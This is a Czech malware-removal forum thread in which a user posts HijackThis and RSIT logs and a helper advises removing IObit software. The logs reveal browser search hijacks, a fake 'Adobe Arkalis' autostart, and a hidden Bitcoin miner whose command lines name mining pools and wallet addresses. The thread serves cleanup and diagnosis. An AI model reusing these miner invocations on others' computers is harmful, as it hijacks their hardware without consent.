Log preventivka

[Nomad]

Dobrý večer,
prosím o kontrolu logu.
Děkuji.



Logfile of Trend Micro HijackThis v2.0.5
Scan saved at 0:01:32, on 18.4.2015
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v11.0 (11.00.9600.17728)

FIREFOX: 37.0.1 (x86 cs)
Boot mode: Normal

Running processes:
C:\Program Files (x86)\IObit\Game Booster 3\gbtray.exe
C:\Program Files (x86)\IObit\Advanced SystemCare 7\ASCTray.exe
C:\Program Files\Zoner\Photo Studio 15\Program32\ZPSTray.exe
C:\Program Files (x86)\Adobe Arkalis\Adobe_Arkalis.exe
C:\Program Files (x86)\Winamp\winamp.exe
d:\Users\Amd\Desktop\HijackThis.exe
C:\Program Files (x86)\Mozilla Firefox\firefox.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.mystartsearch.com/?type=hp&t ... XXZ1DCBEX3
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.seznam.cz/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.mystartsearch.com/?type=hp&t ... XXZ1DCBEX3
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.mystartsearch.com/web/?type= ... earchTerms}
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.mystartsearch.com/web/?type= ... earchTerms}
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://search.gboxapp.com/
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
F2 - REG:system.ini: UserInit=userinit.exe
O2 - BHO: URLRedirectionBHO - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\PROGRA~2\MICROS~1\Office14\URLREDIR.DLL
O4 - HKLM\..\Run: [StartCCC] "C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe" MSRun
O4 - HKLM\..\Run: [WindowsDriverScan86] C:\Program Files (x86)\Adobe Arkalis\Arkalis86.lnk
O4 - HKLM\..\Run: [WindowsDriverScan64] C:\Program Files (x86)\Adobe Arkalis\Arkalis.lnk
O4 - HKCU\..\Run: [Advanced SystemCare 7] "C:\Program Files (x86)\IObit\Advanced SystemCare 7\ASCTray.exe" /Auto
O4 - HKCU\..\Run: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
O4 - HKCU\..\Run: [Zoner Photo Studio Autoupdate] C:\PROGRAM FILES\ZONER\PHOTO STUDIO 15\Program32\ZPSTRAY.EXE
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-19\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-20\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'NETWORK SERVICE')
O4 - Startup: conhost32.exe
O8 - Extra context menu item: E&xportovat do aplikace Microsoft Excel - res://C:\PROGRA~1\MICROS~1\Office14\EXCEL.EXE/3000
O8 - Extra context menu item: Od&eslat do aplikace OneNote - res://C:\PROGRA~1\MICROS~1\Office14\ONBttnIE.dll/105
O9 - Extra button: Odeslat do aplikace OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: Od&eslat do aplikace OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
O9 - Extra button: P&ropojené poznámky aplikace OneNote - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
O9 - Extra 'Tools' menuitem: P&ropojené poznámky aplikace OneNote - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O18 - Filter hijack: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: Advanced SystemCare Service 7 (AdvancedSystemCareService7) - IObit - C:\Program Files (x86)\IObit\Advanced SystemCare 7\ASCService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: AMD External Events Utility - Unknown owner - C:\Windows\system32\atiesrxx.exe (file missing)
O23 - Service: AMD FUEL Service - Advanced Micro Devices, Inc. - C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: Futuremark SystemInfo Service - Futuremark - C:\Program Files (x86)\Futuremark\SystemInfo\FMSISvc.exe
O23 - Service: globalUpdate Update Service (globalUpdate) (globalUpdate) - globalUpdate - C:\Program Files (x86)\globalUpdate\Update\GoogleUpdate.exe
O23 - Service: globalUpdate Update Service (globalUpdatem) (globalUpdatem) - globalUpdate - C:\Program Files (x86)\globalUpdate\Update\GoogleUpdate.exe
O23 - Service: Služba Google Update (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Služba Google Update (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\Windows\system32\IEEtwCollector.exe (file missing)
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: McAfee Security Scan Component Host Service (McComponentHostService) - McAfee, Inc. - C:\Program Files\McAfee Security Scan\3.8.150\McCHSvc.exe
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: NBService - Nero AG - C:\Program Files (x86)\Nero\Nero 7\Nero BackItUp\NBService.exe
O23 - Service: NMIndexingService - Nero AG - C:\Program Files (x86)\Common Files\Ahead\Lib\NMIndexingService.exe
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\Wat\WatUX.exe,-601 (WatAdminSvc) - Unknown owner - C:\Windows\system32\Wat\WatAdminSvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 8798 bytes

[Márty84]

Zdravim

Odinstalujte vse od IObit. Dela to vic skody nez uzitku

Samotny HJT uz je nekolik let nedostacujici, zvlast u 64bit systemu. Takze dejte log z RSITx64 http://images.malwareremoval.com/random/RSITx64.exe . Navod zde http://forum.viry.cz/viewtopic.php?f=30&t=130787

[Nomad]

IObit smazán.
Vkládám nový Lob.

Logfile of random's system information tool 1.10 (written by random/random)
Run by Amd at 2015-04-19 08:56:33
Microsoft Windows 7 Professional Service Pack 1
System drive C: has 226 GB (57%) free of 400 GB
Total RAM: 8190 MB (73% free)

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 8:56:35, on 19.4.2015
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v11.0 (11.00.9600.17728)
Boot mode: Normal

Running processes:
C:\Program Files\Zoner\Photo Studio 15\Program32\ZPSTray.exe
C:\Program Files (x86)\Adobe Arkalis\Adobe_Arkalis.exe
C:\Program Files (x86)\Mozilla Firefox\firefox.exe
C:\Program Files\trend micro\Amd.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.mystartsearch.com/?type=hp&t ... XXZ1DCBEX3
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.seznam.cz/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.mystartsearch.com/?type=hp&t ... XXZ1DCBEX3
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.mystartsearch.com/web/?type= ... earchTerms}
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.mystartsearch.com/web/?type= ... earchTerms}
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://search.gboxapp.com/
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
F2 - REG:system.ini: UserInit=userinit.exe
O2 - BHO: URLRedirectionBHO - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\PROGRA~2\MICROS~1\Office14\URLREDIR.DLL
O4 - HKLM\..\Run: [StartCCC] "C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe" MSRun
O4 - HKLM\..\Run: [WindowsDriverScan86] C:\Program Files (x86)\Adobe Arkalis\Arkalis86.lnk
O4 - HKLM\..\Run: [WindowsDriverScan64] C:\Program Files (x86)\Adobe Arkalis\Arkalis.lnk
O4 - HKCU\..\Run: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
O4 - HKCU\..\Run: [Zoner Photo Studio Autoupdate] C:\PROGRAM FILES\ZONER\PHOTO STUDIO 15\Program32\ZPSTRAY.EXE
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-19\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-20\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'NETWORK SERVICE')
O4 - Startup: conhost32.exe
O8 - Extra context menu item: E&xportovat do aplikace Microsoft Excel - res://C:\PROGRA~1\MICROS~1\Office14\EXCEL.EXE/3000
O8 - Extra context menu item: Od&eslat do aplikace OneNote - res://C:\PROGRA~1\MICROS~1\Office14\ONBttnIE.dll/105
O9 - Extra button: Odeslat do aplikace OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: Od&eslat do aplikace OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
O9 - Extra button: P&ropojené poznámky aplikace OneNote - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
O9 - Extra 'Tools' menuitem: P&ropojené poznámky aplikace OneNote - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O18 - Filter hijack: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: AMD External Events Utility - Unknown owner - C:\Windows\system32\atiesrxx.exe (file missing)
O23 - Service: AMD FUEL Service - Advanced Micro Devices, Inc. - C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: Futuremark SystemInfo Service - Futuremark - C:\Program Files (x86)\Futuremark\SystemInfo\FMSISvc.exe
O23 - Service: globalUpdate Update Service (globalUpdate) (globalUpdate) - globalUpdate - C:\Program Files (x86)\globalUpdate\Update\GoogleUpdate.exe
O23 - Service: globalUpdate Update Service (globalUpdatem) (globalUpdatem) - globalUpdate - C:\Program Files (x86)\globalUpdate\Update\GoogleUpdate.exe
O23 - Service: Služba Google Update (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Služba Google Update (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\Windows\system32\IEEtwCollector.exe (file missing)
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: McAfee Security Scan Component Host Service (McComponentHostService) - McAfee, Inc. - C:\Program Files\McAfee Security Scan\3.8.150\McCHSvc.exe
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: NBService - Nero AG - C:\Program Files (x86)\Nero\Nero 7\Nero BackItUp\NBService.exe
O23 - Service: NMIndexingService - Nero AG - C:\Program Files (x86)\Common Files\Ahead\Lib\NMIndexingService.exe
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\Wat\WatUX.exe,-601 (WatAdminSvc) - Unknown owner - C:\Windows\system32\Wat\WatAdminSvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 8344 bytes

======Listing Processes======



\SystemRoot\System32\smss.exe
%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
wininit.exe
%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
C:\Windows\system32\services.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsm.exe
winlogon.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
"C:\Program Files\Microsoft Security Client\MsMpEng.exe"
C:\Windows\system32\atiesrxx.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k GPSvcGroup
C:\Windows\system32\svchost.exe -k NetworkService
atieclxx
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
"C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe" /launchService
"C:\Windows\system32\rundll32.exe" "c:\Program Files (x86)\DeltaFix\DeltaFix.dll",serv
"C:\Windows\system32\rundll32.exe" "c:\Program Files (x86)\DeltaFix\DeltaFix.dll",serv
"C:\Program Files\Microsoft Security Client\NisSrv.exe"
"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /c
"C:\Program Files\Windows Media Player\wmpnetwk.exe"
C:\Windows\system32\SearchIndexer.exe /Embedding
"taskhost.exe"
taskeng.exe {AA7B9AF4-260C-4364-997F-2C89268689E3}
"C:\Windows\system32\Dwm.exe"
C:\Windows\Explorer.EXE
"C:\Program Files (x86)\PCMeter\PCMeterV0.3.exe"
"C:\Program Files\Microsoft Security Client\msseces.exe" -hide -runkey
"C:\Program Files\Zoner\Photo Studio 15\Program32\ZPSTray.exe"
"C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM" PriorityLow
Adobe_Arkalis.exe -d0 -f100 http://Adobe.Arkalis:Arkalis@api.bitcoin.cz:8332
\??\C:\Windows\system32\conhost.exe "-908381361-12055643914035836785283850971616718479-9078782711622429026-110518400
"C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe" 0
"C:\Program Files\CCleaner\CCleaner.exe" /MONITOR /uac
C:\Windows\System32\svchost.exe -k LocalServicePeerNet
C:\Windows\system32\cmd.exe /c ""C:\Users\Amd\AppData\Roaming\com.flash.WidgetBrowser\bfgminer.bat" "
\??\C:\Windows\system32\conhost.exe "-14426419232137151958-4519474721112472608-1605689189-433971257-1047508260-965773770
C:\Users\Amd\AppData\Roaming\com.flash.WidgetBrowser\Cisvc.exe --intensity -2 --gpu-threads 1 -o mining.eligius.st:8337 -O 16n3iCva8HYo8u2B8vgFx3nanBZFUrw8Pf -o pool.50btc.com:8332 -O 1PYEGUquxZXYiJNmBr2E6TVqU1wkCLNUQF --scan-time 600

C:\Windows\system32\wbem\wmiprvse.exe
"C:\Windows\system32\taskmgr.exe" /4
taskeng.exe {1675264E-E3B0-4FE7-AF8A-A81CF5BDD36D}
"C:\Program Files (x86)\Mozilla Firefox\firefox.exe"
C:\Windows\System32\svchost.exe -k WerSvcGroup
"d:\Users\Amd\Desktop\RSITx64.exe"

======Scheduled tasks folder======

C:\Windows\tasks\Adobe Flash Player Updater.job - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
C:\Windows\tasks\c1cd1309-a534-4e58-8dc8-77c454728f30-1-6.job - C:\Program Files (x86)\Internet Speed Checker\c1cd1309-a534-4e58-8dc8-77c454728f30-1-6.exe /rawdata=xZ/kHduDrEjwstJhM7nLZxB/L0VybehR2eBNqyvnKUtLoSRe4v7/oBrMuLVnxn5LioxqgzhCO8Go6rBbFXyNNOjJDqmNjvp4uwFxoxCNs/2CEWcPiT9GDNxBxNg/W9/NACWSMLtf28UIAcGl0lm/jEuV765EuNmsf+5FA52LMw0T5H39P9jvRxQRwd/6stRvEPpkCr2tPPm0qkm7WP85OkKTNDroMjWeiimgbqFNdW85JD3irUw6KdUdGrzL8p45l7680iTnryq6Jv206qKNGVBo6aR/XimmyXEn/Wcq/YYH35uJSk+w7eUOPNrgj8L83fq+O6wkQjHK6vGFiuTHVn1y4JcKB5nVptB/8q0TAV6avopzRWnxdVYQwqAO+6cEalb0Rk7gZ7wQJK6iIVluEASpzJmBHqQWnMxFCwsahTYNGhFrdwGS3pyEn8jeOPaUJEa83Y//+6NpZUvlz8nLnHqZLBavtP3UAb54jleUB7L7s67y3Nq3dKmNCzvJA74Cs/doGkoaxW3oa5nXz0eKJmRMHptxPBzLF0X3UVRYw/2Jum20IRl2F/P4n6y9cpj5YJ9kWQSFe+XXd5FlinRjwGCc1DkIgx4KF+L0ovwh5um6uRzONEjU/lZTB6fhSon8YLwu9uDjz67IHCp8r3LTgVBp7vbhRighhoBK29iGqsEB5adErj1NV2S2AsdP2Cr2xPjlG9YEUZVlRmZv3Tq7ynvyCYzK7uvfegQjH13n6K+d0EXF7MNzbORSKnglHrHdDZU223i6vCKxdHWuTC9D/7rUxnVz/XNoseSQNHuhPA/pIosUbmouGS1Jec1dK8S4H8PHaBbU91bNkYNcClYWKL9pXDU1ttEgHOGs+sweNEWOpikZl0f/NWJcSsyeLn//Jut75jebhXS4Q093DJRLO1jjHHy18+TbWYiNRD2/lRwh119DHVK5DVNBWuF/MBSy1uoajYfuemruUhWSualC/C/QhLV3w/tHPGwmifl8J/CPoqT89IRard7H11voh0Ymiu1vCqbfDJtyPyXnpkgWFEWC4+RFYGBJU4j+LYTaKv3y0T6UpZc52874H4gPQdjtSdUuM4A7ntVDMNe+uVW+YJ9Ef32o71gAgosDwwnoLToqkk87foioIsXfpbPIlspku0verjgoBmvjxP3exsAGROcUd3pF6Iyf9lCwOpr6vY2WG0Inr7QiDOex+usTdOI3rOOsO5C6sdqJJZ555baZobuR7gbl7k0Jr2dOV1krqr07lyZx4ju8dtQyTHpgoFqsSKEllXCVFaF9sRqweQ459radU+OfVbX91fQ2yvaONJNFXTLuGmX/wPMuV/cY42i7CFQSjY1+F9WL/If9Hp3i+Q==
C:\Windows\tasks\c1cd1309-a534-4e58-8dc8-77c454728f30-1-7.job - C:\Program Files (x86)\Internet Speed Checker\c1cd1309-a534-4e58-8dc8-77c454728f30-1-7.exe /rawdata=vHCFcaF5AsHWqCv8V6chwo4HXNlS+NhiKeHgjDCBWw5UfXepjp9voBfOIa2qlAVZIeHQSqpfSsQuBIuJCw6GeiSQPw3xRgkrzeJhRClJcBQOULyrFPtJ57At6ggoFSG7EHjyQlzjMKuZ6B6w/cuR/J43CvN6XyzO7cKqDrkBYe6Zqt7jiPXHo7/LHVUni0VaR1KxGzMGHq74zuEvB46j2eym3bJuh1sJfEEO0DWSCUaiHfTvwarEx9KYiGZuKbiBv6ewQ4E4dx9BRm5e3g9RNB28Nzk07biyx4r5fSB4rNPdTxFdVC4ecPnu2Ww2bXtkTcknnDQ/IhwkptsxIXdeKUplWxwNbVcJ2jvyP/crmKOoxOdiLugy7YftstPcHLN7i0M5j1KWn8F+/iddvC/C1KWQcI5mW4za0ENgmTKfCIKFngRZ+03+UBcoXK7KE4MGcuqj/vM6fG1ZJlkRJE/i7zBrESFEoH3YbV4t2cptlttuk8MqBDgZUqKIRFjVEjYlxEjU8/gMUG4itEbOYKjfREYUtG09zfjfCg5/PY8rVummOhwzjK/c3PpxjGpHdrkW85bchNmVrUTrUEJIRP8QCGJqASWp4qIC2ndUV8KHX6Ac9n13dE4GXoWGYdkOFD/uA0jUNAogjloBHR2h94TPQ9pW2gYPxycZohbv4wRK5O4VfWnUq8s8JBkjXPMoKAV/7UzOtvmkDCdl9Dzole8xBwVIuIWnD/L389A43gDlQnFsOydr9T7VHl1Jjal6i4RR4ECmXj7/Gibl92NxlHtIn1zVML1XQndV5t97fNec8Sk+iy3mYzkViS/aBORdAZE1uW4f5bvbqqe2OA5AwfGxcHqbV9dv9f85N/scE6AVNmkCSRhsUArCKaXJChkknK5apx6l7p+MPGHChTOhWORsvt0wv16XZkRzA51+apmPc9Ab7NLaT3l1AMwxzHjmo4FWmZW0SdIiXn8DqG8BWTCADSGEDnWItIuxjrvPjj/Rf+7AuLExEHSTdrHLTk5V+mYJF1cPUopwDM7cQ9PVCzueVwQKl0BaZRS/S1ybBl9/rEb9HP/8oZ4tf+vVcm/lV/+Kkx4bNX2liivAlyscvULvD1xtF8cpIMtWNh9lpcpwM3PFf/weBAGg58mFQ33yR11Aw+GtHO9F+kL23aEDG8xqdzq4eMmPFEY3VxeiwmtupjZj9gNYJXTDukfgrgWq+WwwDawhJFUq7VR9kJt9smCjZt0RtXaAi3jDUjJPdU49BCirb1+IxU81rDJZxthhtuKlwZmVs/z0ap3Ah9LK3LL6S4fCE1slJVso1mEPDMiQfmblFUCkW9a/Z6mEj4udNsMKVKF4XDid4WtApWiNE/S+blVpvQfZDCHWpjNbrMfqnkUyyQ/1yzA3LNPgYAKXjfYxPXw/l+tpECAAzUps/6IOXD0umR2Y3zFm2PJWQjnjolTjWi4aokgksNre3fORdeNeT7xoOPwK4IdK51M75nyjZ//CPxJk7fuQIaY398PjskWNOQM3NzAxx/og7AwFhwA4
